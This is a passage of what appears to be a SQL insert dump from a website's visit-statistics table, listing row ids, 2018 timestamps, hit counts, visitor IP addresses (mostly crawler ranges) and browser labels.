.36.148.153','other'),(311438,1538560130,1,1,0,0,'54.36.149.70','other'),(311439,1538560293,1,1,0,0,'54.36.148.230','other'),(311440,1538560294,1,1,0,0,'54.36.149.5','other'),(311441,1538560586,1,1,0,0,'54.36.148.91','other'),(311442,1538560682,1,1,0,0,'54.36.149.87','other'),(311443,1538560895,1,1,0,0,'66.249.64.201','chrome'),(311444,1538560934,2,2,0,0,'216.244.66.241','other'),(311445,1538561135,1,1,0,0,'54.36.149.17','other'),(311446,1538561281,1,1,0,0,'54.36.149.89','other'),(311447,1538561391,1,1,0,0,'54.36.148.95','other'),(311448,1538561495,1,1,0,0,'54.36.148.166','other'),(311449,1538561512,1,1,0,0,'54.36.149.4','other'),(311450,1538561745,1,1,0,0,'54.36.149.42','other'),(311451,1538562306,1,1,0,0,'51.255.65.46','other'),(311452,1538562317,1,1,0,0,'54.36.149.12','other'),(311453,1538562588,1,1,0,0,'66.249.64.195','chrome'),(311454,1538562623,1,1,0,0,'54.36.148.214','other'),(311455,1538562784,1,1,0,0,'54.36.148.157','other'),(311456,1538562854,1,1,0,0,'54.36.148.38','other'),(311457,1538563013,2,2,0,0,'216.244.66.241','other'),(311458,1538563126,1,1,0,0,'54.36.148.125','other'),(311459,1538563214,1,1,0,0,'46.211.37.63','chrome'),(311460,1538563260,1,1,0,0,'54.36.148.230','other'),(311461,1538563373,1,1,0,0,'54.36.148.237','other'),(311462,1538564258,1,1,0,0,'54.36.149.90','other'),(311463,1538564491,1,1,0,0,'54.36.149.2','other'),(311464,1538564686,1,1,0,0,'54.36.149.86','other'),(311465,1538565025,1,1,0,0,'54.36.148.110','other'),(311466,1538565095,1,1,0,0,'130.180.218.238','chrome'),(311467,1538565245,1,1,0,0,'66.249.64.61','chrome'),(311468,1538565462,1,1,0,0,'91.196.178.74','chrome'),(311469,1538565572,1,1,0,0,'54.36.148.56','other'),(311470,1538565738,2,2,0,0,'91.196.178.185','chrome'),(311471,1538565823,1,1,0,0,'54.36.149.55','other'),(311472,1538565861,2,2,0,0,'8.29.198.27','other'),(311473,1538565889,1,1,0,0,'54.36.148.225','other'),(311474,1538565995,1,1,0,0,'54.36.148.36','other'),(311475,1538566431,1,1,0,0,'54.36.149.76','other'),(311476,1538566434,1,1,0,0,'178.93.26.71','chrome'),(311477,1538566518,1,1,0,0,'54.36.148.49','other'),(311478,1538566597,1,1,0,0,'54.36.148.202','other'),(311479,1538566608,1,1,0,0,'66.249.64.201','chrome'),(311480,1538566782,1,1,0,0,'37.115.208.160','chrome'),(311481,1538566846,1,1,0,0,'54.36.148.78','other'),(311482,1538566919,1,1,0,0,'54.36.149.30','other'),(311483,1538566946,1,1,0,0,'54.36.149.11','other'),(311484,1538566968,1,1,0,0,'54.36.149.2','other'),(311485,1538567646,1,1,0,0,'37.17.172.132','firefox'),(311486,1538567696,1,1,0,0,'54.36.148.75','other'),(311487,1538567814,1,1,0,0,'54.36.148.233','other'),(311488,1538568202,1,1,0,0,'54.36.148.80','other'),(311489,1538568253,2,2,0,0,'91.196.178.74','chrome'),(311490,1538568274,1,1,0,0,'54.36.148.218','other'),(311491,1538568318,1,1,0,0,'54.36.148.103','other'),(311492,1538568347,1,1,0,0,'54.36.148.169','other'),(311493,1538568407,1,1,0,0,'54.36.148.91','other'),(311494,1538568497,1,1,0,0,'66.249.64.199','chrome'),(311495,1538568509,2,2,0,0,'216.244.66.241','other'),(311496,1538569267,1,1,0,0,'157.55.39.135','other'),(311497,1538569377,2,2,0,0,'95.135.241.217','chrome'),(311498,1538569934,1,1,0,0,'66.249.64.195','chrome'),(311499,1538570263,5,5,0,0,'178.154.244.29','other'),(311500,1538570284,4,4,0,0,'178.154.244.11','other'),(311501,1538570508,2,2,0,0,'216.244.66.241','other'),(311502,1538570567,1,1,0,0,'8.29.198.27','other'),(311503,1538570826,5,5,0,0,'5.45.207.79','other'),(311504,1538570834,1,1,0,0,'40.77.167.141','other'),(311505,1538571220,2,2,0,0,'178.154.244.11','other'),(311506,1538571243,3,3,0,0,'178.154.244.29','other'),(311507,1538571538,1,1,0,0,'91.196.178.74','chrome'),(311508,1538571961,1,1,0,0,'5.45.207.79','other'),(311509,1538572332,11,11,0,0,'178.154.244.29','other'),(311510,1538572387,5,5,0,0,'178.154.244.11','other'),(311511,1538573323,2,2,0,0,'178.154.244.29','other'),(311512,1538573374,1,1,0,0,'178.154.244.11','other'),(311513,1538573571,1,1,0,0,'66.249.64.201','chrome'),(311514,1538573646,1,1,0,0,'66.249.64.195','chrome'),(311515,1538574237,1,1,0,0,'178.154.244.29','other'),(311516,1538574329,1,1,0,0,'54.36.148.39','other'),(311517,1538574362,1,1,0,0,'54.36.148.180','other'),(311518,1538574575,1,1,0,0,'54.36.148.29','other'),(311519,1538574730,1,1,0,0,'54.36.149.105','other'),(311520,1538574805,2,2,0,0,'178.154.244.11','other'),(311521,1538574964,1,1,0,0,'54.36.148.248','other'),(311522,1538575000,1,1,0,0,'5.45.207.79','other'),(311523,1538575066,1,1,0,0,'54.36.148.227','other'),(311524,1538575277,1,1,0,0,'54.36.149.60','other'),(311525,1538575330,1,1,0,0,'54.36.148.185','other'),(311526,1538575406,1,1,0,0,'54.36.148.170','other'),(311527,1538575943,1,1,0,0,'54.36.148.255','other'),(311528,1538576173,2,2,0,0,'178.154.244.29','other'),(311529,1538576698,1,1,0,0,'8.29.198.25','other'),(311530,1538576726,1,1,0,0,'54.36.148.53','other'),(311531,1538576762,1,1,0,0,'54.36.149.94','other'),(311532,1538576941,1,1,0,0,'8.29.198.26','other'),(311533,1538577005,1,1,0,0,'54.36.148.87','other'),(311534,1538577148,1,1,0,0,'54.36.148.133','other'),(311535,1538577243,1,1,0,0,'178.154.244.29','other'),(311536,1538577392,1,1,0,0,'54.36.149.25','other'),(311537,1538577463,1,1,0,0,'54.36.149.32','other'),(311538,1538577545,2,2,0,0,'216.244.66.241','other'),(311539,1538577891,1,1,0,0,'54.36.149.4','other'),(311540,1538578085,1,1,0,0,'54.36.149.34','other'),(311541,1538578173,2,2,0,0,'178.154.244.29','other'),(311542,1538578270,1,1,0,0,'54.36.148.89','other'),(311543,1538578284,1,1,0,0,'54.36.149.81','other'),(311544,1538578286,1,1,0,0,'54.36.149.74','other'),(311545,1538578441,1,1,0,0,'54.36.149.25','other'),(311546,1538578675,1,1,0,0,'54.36.149.92','other'),(311547,1538578724,1,1,0,0,'54.36.149.100','other'),(311548,1538578920,1,1,0,0,'54.36.148.224','other'),(311549,1538578976,1,1,0,0,'95.132.52.203','firefox'),(311550,1538579427,1,1,0,0,'40.77.167.141','other'),(311551,1538579491,1,1,0,0,'54.36.148.196','other'),(311552,1538579607,1,1,0,0,'40.77.167.43','other'),(311553,1538579740,1,1,0,0,'54.36.149.32','other'),(311554,1538579863,1,1,0,0,'54.36.148.188','other'),(311555,1538580098,1,1,0,0,'103.205.112.44','msie'),(311556,1538580399,1,1,0,0,'54.36.149.98','other'),(311557,1538580410,1,1,0,0,'178.154.244.29','other'),(311558,1538580459,2,2,0,0,'62.205.134.182','msie'),(311559,1538580809,1,1,0,0,'54.36.149.80','other'),(311560,1538580909,1,1,0,0,'54.36.149.20','other'),(311561,1538580991,1,1,0,0,'66.249.64.199','chrome'),(311562,1538580994,1,1,0,0,'54.36.149.99','other'),(311563,1538581205,1,1,0,0,'54.36.148.75','other'),(311564,1538581407,1,1,0,0,'8.29.198.25','other'),(311565,1538581446,1,1,0,0,'54.36.149.106','other'),(311566,1538581648,1,1,0,0,'54.36.148.124','other'),(311567,1538581668,1,1,0,0,'54.36.148.62','other'),(311568,1538581679,1,1,0,0,'54.36.148.252','other'),(311569,1538581862,1,1,0,0,'54.36.148.63','other'),(311570,1538582013,1,1,0,0,'54.36.149.99','other'),(311571,1538582040,1,1,0,0,'54.36.148.182','other'),(311572,1538582091,1,1,0,0,'51.255.65.46','other'),(311573,1538582219,1,1,0,0,'54.36.148.17','other'),(311574,1538582237,1,1,0,0,'54.36.148.140','other'),(311575,1538582255,2,2,0,0,'95.213.141.126','opera'),(311576,1538582256,1,1,0,0,'54.36.148.19','other'),(311577,1538582429,1,1,0,0,'207.46.13.120','other'),(311578,1538583593,1,1,0,0,'54.36.148.74','other'),(311579,1538583699,1,1,0,0,'54.36.148.222','other'),(311580,1538583740,1,1,0,0,'216.244.66.241','other'),(311581,1538583998,1,1,0,0,'91.196.178.77','chrome'),(311582,1538584032,1,1,0,0,'54.36.148.121','other'),(311583,1538584108,1,1,0,0,'54.36.149.93','other'),(311584,1538584133,1,1,0,0,'54.36.149.3','other'),(311585,1538584610,1,1,0,0,'54.36.148.118','other'),(311586,1538584825,1,1,0,0,'54.36.149.43','other'),(311587,1538584830,1,1,0,0,'54.36.148.214','other'),(311588,1538584851,1,1,0,0,'66.249.64.201','chrome'),(311589,1538584875,1,1,0,0,'54.36.149.25','other'),(311590,1538584930,2,2,0,0,'31.129.77.193','chrome'),(311591,1538585071,1,1,0,0,'54.36.149.84','other'),(311592,1538585078,2,2,0,0,'54.36.149.19','other'),(311593,1538585140,1,1,0,0,'54.36.149.85','other'),(311594,1538585201,1,1,0,0,'54.36.148.48','other'),(311595,1538585205,1,1,0,0,'54.36.148.228','other'),(311596,1538585339,1,1,0,0,'54.36.148.62','other'),(311597,1538585523,1,1,0,0,'54.36.148.146','other'),(311598,1538585561,1,1,0,0,'216.244.66.241','other'),(311599,1538585671,1,1,0,0,'178.94.9.141','chrome'),(311600,1538585745,1,1,0,0,'54.36.148.10','other'),(311601,1538586308,1,1,0,0,'91.196.178.167','chrome'),(311602,1538586515,1,1,0,0,'54.36.149.96','other'),(311603,1538587181,1,1,0,0,'91.196.178.49','chrome'),(311604,1538587249,1,1,0,0,'91.196.178.181','chrome'),(311605,1538587427,1,1,0,0,'54.36.148.69','other'),(311606,1538587502,1,1,0,0,'54.36.148.169','other'),(311607,1538587527,1,1,0,0,'8.29.198.25','other'),(311608,1538587771,1,1,0,0,'178.133.96.237','chrome'),(311609,1538587772,1,1,0,0,'8.29.198.26','other'),(311610,1538588053,2,2,0,0,'216.244.66.241','other'),(311611,1538588164,1,1,0,0,'54.36.148.175','other'),(311612,1538588240,1,1,0,0,'54.36.148.10','other'),(311613,1538588312,1,1,0,0,'54.36.148.203','other'),(311614,1538588387,1,1,0,0,'54.36.148.119','other'),(311615,1538588398,1,1,0,0,'54.36.149.44','other'),(311616,1538588609,1,1,0,0,'54.36.149.15','other'),(311617,1538588649,1,1,0,0,'54.36.149.20','other'),(311618,1538588722,1,1,0,0,'54.36.148.254','other'),(311619,1538588985,1,1,0,0,'216.244.66.241','other'),(311620,1538588995,1,1,0,0,'54.36.148.89','other'),(311621,1538589324,1,1,0,0,'54.36.149.59','other'),(311622,1538589445,1,1,0,0,'66.249.64.199','chrome'),(311623,1538589470,11,11,0,0,'158.69.252.176','other'),(311624,1538589578,1,1,0,0,'54.36.148.114','other'),(311625,1538590165,1,1,0,0,'54.36.149.50','other'),(311626,1538590368,1,1,0,0,'66.249.64.201','chrome'),(311627,1538590712,1,1,0,0,'54.36.148.218','other'),(311628,1538591009,27,27,0,0,'78.46.85.236','other'),(311629,1538591156,1,1,0,0,'37.17.172.132','firefox'),(311630,1538591534,1,1,0,0,'54.36.148.33','other'),(311631,1538591767,1,1,0,0,'54.36.148.81','other'),(311632,1538591913,1,1,0,0,'54.36.149.24','other'),(311633,1538592200,1,1,0,0,'91.196.178.136','firefox'),(311634,1538592242,1,1,0,0,'8.29.198.25','other'),(311635,1538592329,1,1,0,0,'54.36.148.22','other'),(311636,1538592540,1,1,0,0,'216.244.66.241','other'),(311637,1538593023,1,1,0,0,'54.36.149.18','other'),(311638,1538593247,1,1,0,0,'54.36.149.19','other'),(311639,1538593427,1,1,0,0,'54.36.148.123','other'),(311640,1538593439,1,1,0,0,'54.36.148.147','other'),(311641,1538593528,1,1,0,0,'54.36.149.17','other'),(311642,1538593603,1,1,0,0,'54.36.148.189','other'),(311643,1538593741,1,1,0,0,'54.36.148.22','other'),(311644,1538593798,1,1,0,0,'37.55.57.72','chrome'),(311645,1538593810,2,2,0,0,'216.244.66.241','other'),(311646,1538593948,1,1,0,0,'54.36.148.113','other'),(311647,1538594054,1,1,0,0,'54.36.148.167','other'),(311648,1538594098,1,1,0,0,'54.36.148.119','other'),(311649,1538594443,1,1,0,0,'54.36.148.131','other'),(311650,1538594768,1,1,0,0,'54.36.148.95','other'),(311651,1538595301,1,1,0,0,'178.133.35.42','chrome'),(311652,1538595424,1,1,0,0,'178.251.110.181','chrome'),(311653,1538595445,1,1,0,0,'54.36.148.214','other'),(311654,1538595699,1,1,0,0,'54.36.148.41','other'),(311655,1538595756,1,1,0,0,'54.36.149.76','other'),(311656,1538595846,1,1,0,0,'54.36.148.221','other'),(311657,1538595880,1,1,0,0,'54.36.148.149','other'),(311658,1538596040,1,1,0,0,'54.36.149.101','other'),(311659,1538596063,10,10,0,0,'62.205.134.182','msie'),(311660,1538596316,1,1,0,0,'54.36.149.63','other'),(311661,1538596322,1,1,0,0,'54.36.149.91','other'),(311662,1538596403,1,1,0,0,'54.36.149.100','other'),(311663,1538596422,1,1,0,0,'54.36.148.247','other'),(311664,1538596446,1,1,0,0,'54.36.148.184','other'),(311665,1538596514,1,1,0,0,'54.36.148.166','other'),(311666,1538596925,1,1,0,0,'5.45.207.79','other'),(311667,1538597058,1,1,0,0,'54.36.148.229','other'),(311668,1538597272,1,1,0,0,'54.36.148.89','other'),(311669,1538597548,1,1,0,0,'54.36.148.195','other'),(311670,1538597557,1,1,0,0,'54.36.149.59','other'),(311671,1538597632,1,1,0,0,'54.36.148.17','other'),(311672,1538597764,1,1,0,0,'54.36.148.182','other'),(311673,1538597783,1,1,0,0,'54.36.149.21','other'),(311674,1538597812,1,1,0,0,'54.36.148.194','other'),(311675,1538598229,1,1,0,0,'54.36.148.168','other'),(311676,1538598357,1,1,0,0,'8.29.198.26','other'),(311677,1538598564,1,1,0,0,'54.36.148.147','other'),(311678,1538598613,1,1,0,0,'8.29.198.27','other'),(311679,1538598644,1,1,0,0,'66.249.64.201','chrome'),(311680,1538598944,1,1,0,0,'54.36.148.68','other'),(311681,1538599001,1,1,0,0,'54.36.148.124','other'),(311682,1538599124,1,1,0,0,'54.36.148.110','other'),(311683,1538599321,1,1,0,0,'54.36.148.192','other'),(311684,1538599362,1,1,0,0,'54.36.149.74','other'),(311685,1538599393,1,1,0,0,'66.249.64.195','chrome'),(311686,1538599535,1,1,0,0,'54.36.148.34','other'),(311687,1538599984,1,1,0,0,'54.36.149.24','other'),(311688,1538600144,1,1,0,0,'54.36.148.58','other'),(311689,1538600918,1,1,0,0,'54.36.148.251','other'),(311690,1538600939,1,1,0,0,'54.36.148.27','other'),(311691,1538601029,1,1,0,0,'54.36.148.32','other'),(311692,1538601351,1,1,0,0,'54.36.149.99','other'),(311693,1538601557,2,2,0,0,'207.46.13.120','other'),(311694,1538601770,1,1,0,0,'202.140.233.81','firefox'),(311695,1538601926,1,1,0,0,'54.36.149.95','other'),(311696,1538601974,2,2,0,0,'40.77.167.192','other'),(311697,1538602089,4,4,0,0,'40.77.167.206','other'),(311698,1538602155,2,2,0,0,'216.244.66.241','other'),(311699,1538602269,2,2,0,0,'40.77.167.208','other'),(311700,1538602540,1,1,0,0,'66.249.64.61','chrome'),(311701,1538603081,1,1,0,0,'8.29.198.27','other'),(311702,1538603236,1,1,0,0,'178.251.110.181','chrome'),(311703,1538603663,1,1,0,0,'54.36.148.231','other'),(311704,1538603706,1,1,0,0,'54.36.148.158','other'),(311705,1538604504,1,1,0,0,'54.36.148.192','other'),(311706,1538604701,1,1,0,0,'54.36.148.36','other'),(311707,1538604992,1,1,0,0,'54.36.148.150','other'),(311708,1538605312,1,1,0,0,'54.36.149.98','other'),(311709,1538605335,1,1,0,0,'54.36.148.234','other'),(311710,1538605500,1,1,0,0,'54.36.148.129','other'),(311711,1538605505,1,1,0,0,'54.36.148.232','other'),(311712,1538605642,1,1,0,0,'54.36.148.46','other'),(311713,1538605924,1,1,0,0,'54.36.149.37','other'),(311714,1538606204,1,1,0,0,'54.36.148.77','other'),(311715,1538606328,1,1,0,0,'54.36.149.54','other'),(311716,1538606355,1,1,0,0,'54.36.148.195','other'),(311717,1538606375,1,1,0,0,'66.249.64.57','chrome'),(311718,1538606578,1,1,0,0,'54.36.148.47','other'),(311719,1538606720,1,1,0,0,'54.36.148.219','other'),(311720,1538606792,2,2,0,0,'216.244.66.241','other'),(311721,1538606997,1,1,0,0,'54.36.149.55','other'),(311722,1538607278,1,1,0,0,'54.36.149.71','other'),(311723,1538607304,1,1,0,0,'54.36.148.57','other'),(311724,1538607368,1,1,0,0,'85.199.141.237','other'),(311725,1538607772,1,1,0,0,'54.36.149.11','other'),(311726,1538608036,1,1,0,0,'66.249.64.195','chrome'),(311727,1538608305,1,1,0,0,'216.244.66.241','other'),(311728,1538608674,1,1,0,0,'180.76.15.17','other'),(311729,1538609097,1,1,0,0,'54.36.148.39','other'),(311730,1538609182,1,1,0,0,'8.29.198.27','other'),(311731,1538609214,1,1,0,0,'54.36.148.97','other'),(311732,1538609263,1,1,0,0,'95.163.255.98','other'),(311733,1538609447,1,1,0,0,'8.29.198.25','other'),(311734,1538609900,1,1,0,0,'54.36.149.96','other'),(311735,1538609950,1,1,0,0,'54.36.149.100','other'),(311736,1538610512,1,1,0,0,'207.46.13.120','other'),(311737,1538610973,1,1,0,0,'54.36.149.82','other'),(311738,1538611231,1,1,0,0,'54.36.148.220','other'),(311739,1538611319,1,1,0,0,'54.36.148.121','other'),(311740,1538611356,1,1,0,0,'54.36.148.104','other'),(311741,1538611371,1,1,0,0,'54.36.148.89','other'),(311742,1538611900,1,1,0,0,'54.36.148.82','other'),(311743,1538612025,1,1,0,0,'216.244.66.241','other'),(311744,1538612095,1,1,0,0,'54.36.148.53','other'),(311745,1538612120,1,1,0,0,'54.36.149.72','other'),(311746,1538612155,1,1,0,0,'39.104.225.36','other'),(311747,1538612301,1,1,0,0,'66.249.64.201','chrome'),(311748,1538612326,1,1,0,0,'54.36.148.147','other'),(311749,1538612490,1,1,0,0,'54.36.149.23','other'),(311750,1538612673,1,1,0,0,'54.36.148.14','other'),(311751,1538612687,1,1,0,0,'157.55.39.135','other'),(311752,1538612704,1,1,0,0,'54.36.149.92','other'),(311753,1538612777,1,1,0,0,'54.36.148.241','other'),(311754,1538612895,1,1,0,0,'54.36.149.61','other'),(311755,1538612906,1,1,0,0,'54.36.148.173','other'),(311756,1538613144,1,1,0,0,'54.36.148.189','other'),(311757,1538613233,1,1,0,0,'54.36.148.171','other'),(311758,1538613338,1,1,0,0,'54.36.149.44','other'),(311759,1538613359,1,1,0,0,'54.36.149.69','other'),(311760,1538613368,1,1,0,0,'66.249.64.195','chrome'),(311761,1538613374,1,1,0,0,'37.17.172.132','firefox'),(311762,1538613542,1,1,0,0,'54.36.149.3','other'),(311763,1538613684,1,1,0,0,'54.36.148.135','other'),(311764,1538613719,1,1,0,0,'54.36.148.15','other'),(311765,1538613744,1,1,0,0,'54.36.149.29','other'),(311766,1538613919,1,1,0,0,'8.29.198.27','other'),(311767,1538614063,1,1,0,0,'54.36.149.15','other'),(311768,1538614315,1,1,0,0,'54.36.149.54','other'),(311769,1538614454,1,1,0,0,'54.36.149.64','other'),(311770,1538614518,1,1,0,0,'54.36.148.194','other'),(311771,1538614746,1,1,0,0,'54.36.148.156','other'),(311772,1538614769,1,1,0,0,'216.244.66.241','other'),(311773,1538615068,1,1,0,0,'66.249.64.201','chrome'),(311774,1538615305,1,1,0,0,'54.36.148.228','other'),(311775,1538615729,1,1,0,0,'54.36.148.77','other'),(311776,1538616078,1,1,0,0,'54.36.148.218','other'),(311777,1538616098,2,2,0,0,'66.249.64.201','chrome'),(311778,1538616292,1,1,0,0,'54.36.148.208','other'),(311779,1538616432,1,1,0,0,'54.36.148.213','other'),(311780,1538616558,1,1,0,0,'54.36.148.20','other'),(311781,1538616772,3,3,0,0,'66.249.64.195','chrome'),(311782,1538616940,1,1,0,0,'66.249.64.199','chrome'),(311783,1538617179,1,1,0,0,'54.36.148.26','other'),(311784,1538617441,1,1,0,0,'54.36.148.16','other'),(311785,1538617650,1,1,0,0,'54.36.148.164','other'),(311786,1538618088,2,2,0,0,'178.154.244.29','other'),(311787,1538618194,1,1,0,0,'178.154.244.11','other'),(311788,1538618231,1,1,0,0,'66.249.64.201','chrome'),(311789,1538618311,1,1,0,0,'141.8.132.16','other'),(311790,1538618569,1,1,0,0,'54.36.149.23','other'),(311791,1538618639,1,1,0,0,'54.36.148.198','other'),(311792,1538618917,1,1,0,0,'66.249.64.57','chrome'),(311793,1538618951,1,1,0,0,'87.250.224.118','other'),(311794,1538619382,1,1,0,0,'54.36.148.246','other'),(311795,1538619635,1,1,0,0,'66.249.64.201','chrome'),(311796,1538619916,1,1,0,0,'54.36.149.53','other'),(311797,1538620002,2,2,0,0,'8.29.198.27','other'),(311798,1538620045,1,1,0,0,'54.36.148.80','other'),(311799,1538620101,1,1,0,0,'54.36.149.94','other'),(311800,1538620102,1,1,0,0,'54.36.148.26','other'),(311801,1538620163,1,1,0,0,'54.36.148.189','other'),(311802,1538620887,1,1,0,0,'54.36.148.227','other'),(311803,1538621128,1,1,0,0,'54.36.149.18','other'),(311804,1538621186,1,1,0,0,'54.36.148.23','other'),(311805,1538621249,1,1,0,0,'54.36.149.1','other'),(311806,1538621381,1,1,0,0,'216.244.66.241','other'),(311807,1538621717,1,1,0,0,'54.36.149.87','other'),(311808,1538621889,1,1,0,0,'54.36.148.130','other'),(311809,1538622190,1,1,0,0,'54.36.148.167','other'),(311810,1538622264,1,1,0,0,'54.36.148.46','other'),(311811,1538622396,1,1,0,0,'54.36.148.195','other'),(311812,1538622517,1,1,0,0,'178.154.244.11','other'),(311813,1538622585,1,1,0,0,'54.36.148.132','other'),(311814,1538623217,1,1,0,0,'54.36.149.11','other'),(311815,1538623647,1,1,0,0,'54.36.148.153','other'),(311816,1538624758,1,1,0,0,'8.29.198.26','other'),(311817,1538625077,1,1,0,0,'54.36.148.169','other'),(311818,1538625549,1,1,0,0,'54.36.149.30','other'),(311819,1538625950,1,1,0,0,'54.36.148.68','other'),(311820,1538625985,1,1,0,0,'54.36.148.33','other'),(311821,1538626022,77,77,0,0,'204.12.197.234','other'),(311822,1538626092,1,1,0,0,'54.36.148.66','other'),(311823,1538626232,1,1,0,0,'54.36.148.200','other'),(311824,1538626275,1,1,0,0,'13.66.139.0','other'),(311825,1538626288,1,1,0,0,'54.36.148.130','other'),(311826,1538626651,1,1,0,0,'54.36.148.80','other'),(311827,1538627195,1,1,0,0,'66.249.64.195','chrome'),(311828,1538627464,1,1,0,0,'54.36.148.63','other'),(311829,1538627540,1,1,0,0,'54.36.148.36','other'),(311830,1538627671,1,1,0,0,'54.36.148.201','other'),(311831,1538627790,1,1,0,0,'54.36.148.187','other'),(311832,1538627821,1,1,0,0,'54.36.148.170','other'),(311833,1538628227,1,1,0,0,'54.36.148.194','other'),(311834,1538628440,1,1,0,0,'54.36.148.197','other'),(311835,1538628643,1,1,0,0,'54.36.148.153','other'),(311836,1538628878,1,1,0,0,'54.36.148.212','other'),(311837,1538629059,1,1,0,0,'54.36.148.94','other'),(311838,1538629099,1,1,0,0,'54.36.148.72','other'),(311839,1538629101,1,1,0,0,'54.36.148.223','other'),(311840,1538629137,1,1,0,0,'54.36.149.73','other'),(311841,1538629199,1,1,0,0,'54.36.148.111','other'),(311842,1538629388,1,1,0,0,'54.36.148.79','other'),(311843,1538629408,1,1,0,0,'54.36.148.184','other'),(311844,1538629482,1,1,0,0,'54.36.148.191','other'),(311845,1538629484,1,1,0,0,'95.163.255.97','other'),(311846,1538629921,1,1,0,0,'54.36.148.200','other'),(311847,1538629964,1,1,0,0,'54.36.148.15','other'),(311848,1538630005,1,1,0,0,'54.36.148.182','other'),(311849,1538630032,1,1,0,0,'54.36.148.161','other'),(311850,1538630263,1,1,0,0,'54.36.149.88','other'),(311851,1538630305,1,1,0,0,'54.36.149.41','other'),(311852,1538630311,1,1,0,0,'178.93.26.71','chrome'),(311853,1538630395,1,1,0,0,'37.17.172.132','firefox'),(311854,1538630397,1,1,0,0,'54.36.149.106','other'),(311855,1538630609,1,1,0,0,'54.36.148.57','other'),(311856,1538630624,1,1,0,0,'216.244.66.241','other'),(311857,1538630844,1,1,0,0,'8.29.198.26','other'),(311858,1538631006,1,1,0,0,'54.36.148.252','other'),(311859,1538631116,1,1,0,0,'8.29.198.25','other'),(311860,1538631428,1,1,0,0,'91.196.178.74','chrome'),(311861,1538631458,1,1,0,0,'54.36.148.174','other'),(311862,1538631786,2,2,0,0,'54.36.149.69','other'),(311863,1538631969,1,1,0,0,'54.36.148.194','other'),(311864,1538632203,1,1,0,0,'66.249.64.195','chrome'),(311865,1538632234,9,9,0,0,'81.109.85.9','other'),(311866,1538632260,1,1,0,0,'54.36.148.242','other'),(311867,1538633060,1,1,0,0,'54.36.148.173','other'),(311868,1538633444,2,2,0,0,'66.249.64.201','chrome'),(311869,1538633701,1,1,0,0,'54.36.148.225','other'),(311870,1538633807,1,1,0,0,'54.36.149.9','other'),(311871,1538634169,1,1,0,0,'54.36.148.16','other'),(311872,1538634429,1,1,0,0,'54.36.149.45','other'),(311873,1538634677,1,1,0,0,'91.196.178.92','firefox'),(311874,1538634908,1,1,0,0,'54.36.148.155','other'),(311875,1538635387,1,1,0,0,'54.36.148.39','other'),(311876,1538635592,1,1,0,0,'8.29.198.26','other'),(311877,1538635664,1,1,0,0,'188.230.43.254','other'),(311878,1538635773,1,1,0,0,'54.36.148.92','other'),(311879,1538636243,1,1,0,0,'54.36.148.114','other'),(311880,1538636266,1,1,0,0,'216.244.66.241','other'),(311881,1538636563,1,1,0,0,'54.36.148.53','other'),(311882,1538636642,1,1,0,0,'54.36.148.56','other'),(311883,1538636672,1,1,0,0,'54.36.148.206','other'),(311884,1538636680,1,1,0,0,'54.36.148.195','other'),(311885,1538636733,2,2,0,0,'91.196.178.189','chrome'),(311886,1538636962,1,1,0,0,'91.196.178.74','chrome'),(311887,1538637108,1,1,0,0,'54.36.149.66','other'),(311888,1538637133,1,1,0,0,'54.36.148.60','other'),(311889,1538637232,1,1,0,0,'54.36.148.122','other'),(311890,1538637652,1,1,0,0,'54.36.148.252','other'),(311891,1538638057,1,1,0,0,'188.230.43.254','other'),(311892,1538638552,1,1,0,0,'54.36.148.227','other'),(311893,1538638784,1,1,0,0,'54.36.148.103','other'),(311894,1538638860,1,1,0,0,'54.36.148.168','other'),(311895,1538638955,2,2,0,0,'66.249.64.57','chrome'),(311896,1538639075,1,1,0,0,'66.249.64.59','chrome'),(311897,1538639672,1,1,0,0,'92.112.227.76','firefox'),(311898,1538639723,1,1,0,0,'54.36.148.212','other'),(311899,1538640191,1,1,0,0,'54.36.148.36','other'),(311900,1538640199,1,1,0,0,'91.196.178.74','chrome'),(311901,1538640242,1,1,0,0,'54.36.148.55','other'),(311902,1538640458,1,1,0,0,'188.230.43.254','other'),(311903,1538640521,2,2,0,0,'178.154.244.29','other'),(311904,1538640622,1,1,0,0,'216.244.66.241','other'),(311905,1538640729,1,1,0,0,'54.165.59.7','other'),(311906,1538640763,1,1,0,0,'54.36.149.59','other'),(311907,1538640805,2,2,0,0,'31.129.77.193','chrome'),(311908,1538641259,1,1,0,0,'54.36.148.162','other'),(311909,1538641571,1,1,0,0,'54.36.148.233','other'),(311910,1538641584,2,2,0,0,'54.36.148.86','other'),(311911,1538641674,1,1,0,0,'54.36.148.94','other'),(311912,1538641677,2,2,0,0,'8.29.198.27','other'),(311913,1538641816,1,1,0,0,'66.249.64.201','chrome'),(311914,1538641883,1,1,0,0,'54.36.148.109','other'),(311915,1538641947,1,1,0,0,'54.36.148.195','other'),(311916,1538642072,1,1,0,0,'54.36.148.210','other'),(311917,1538642090,1,1,0,0,'54.36.148.91','other'),(311918,1538642171,2,2,0,0,'162.210.196.129','other'),(311919,1538642295,1,1,0,0,'54.165.59.7','other'),(311920,1538642401,3,3,0,0,'178.154.244.29','other'),(311921,1538642510,1,1,0,0,'54.36.148.84','other'),(311922,1538642603,1,1,0,0,'95.108.213.4','other'),(311923,1538642622,1,1,0,0,'66.249.64.195','chrome'),(311924,1538642683,2,2,0,0,'54.36.148.32','other'),(311925,1538642711,1,1,0,0,'54.36.149.99','other'),(311926,1538642770,2,2,0,0,'54.36.149.23','other'),(311927,1538642858,1,1,0,0,'91.196.178.169','chrome'),(311928,1538642861,1,1,0,0,'188.230.43.254','other'),(311929,1538642899,1,1,0,0,'54.36.149.65','other'),(311930,1538643227,1,1,0,0,'178.154.244.11','other'),(311931,1538643490,2,2,0,0,'178.154.244.29','other'),(311932,1538643671,1,1,0,0,'54.36.148.145','other'),(311933,1538643747,1,1,0,0,'66.249.64.61','chrome'),(311934,1538643800,1,1,0,0,'54.36.148.156','other'),(311935,1538643809,1,1,0,0,'54.36.148.69','other'),(311936,1538643828,1,1,0,0,'54.36.148.27','other'),(311937,1538643884,1,1,0,0,'216.244.66.241','other'),(311938,1538643998,1,1,0,0,'54.36.148.176','other'),(311939,1538644253,1,1,0,0,'207.46.13.120','other'),(311940,1538644453,4,4,0,0,'178.154.244.29','other'),(311941,1538644498,1,1,0,0,'54.36.148.40','other'),(311942,1538644676,1,1,0,0,'141.8.142.103','other'),(311943,1538644834,4,4,0,0,'178.154.244.11','other'),(311944,1538644896,3,3,0,0,'5.45.207.79','other'),(311945,1538644956,1,1,0,0,'54.36.149.75','other'),(311946,1538645125,1,1,0,0,'5.45.207.19','other'),(311947,1538645260,1,1,0,0,'188.230.43.254','other'),(311948,1538645390,4,4,0,0,'178.154.244.29','other'),(311949,1538645520,1,1,0,0,'54.36.148.78','other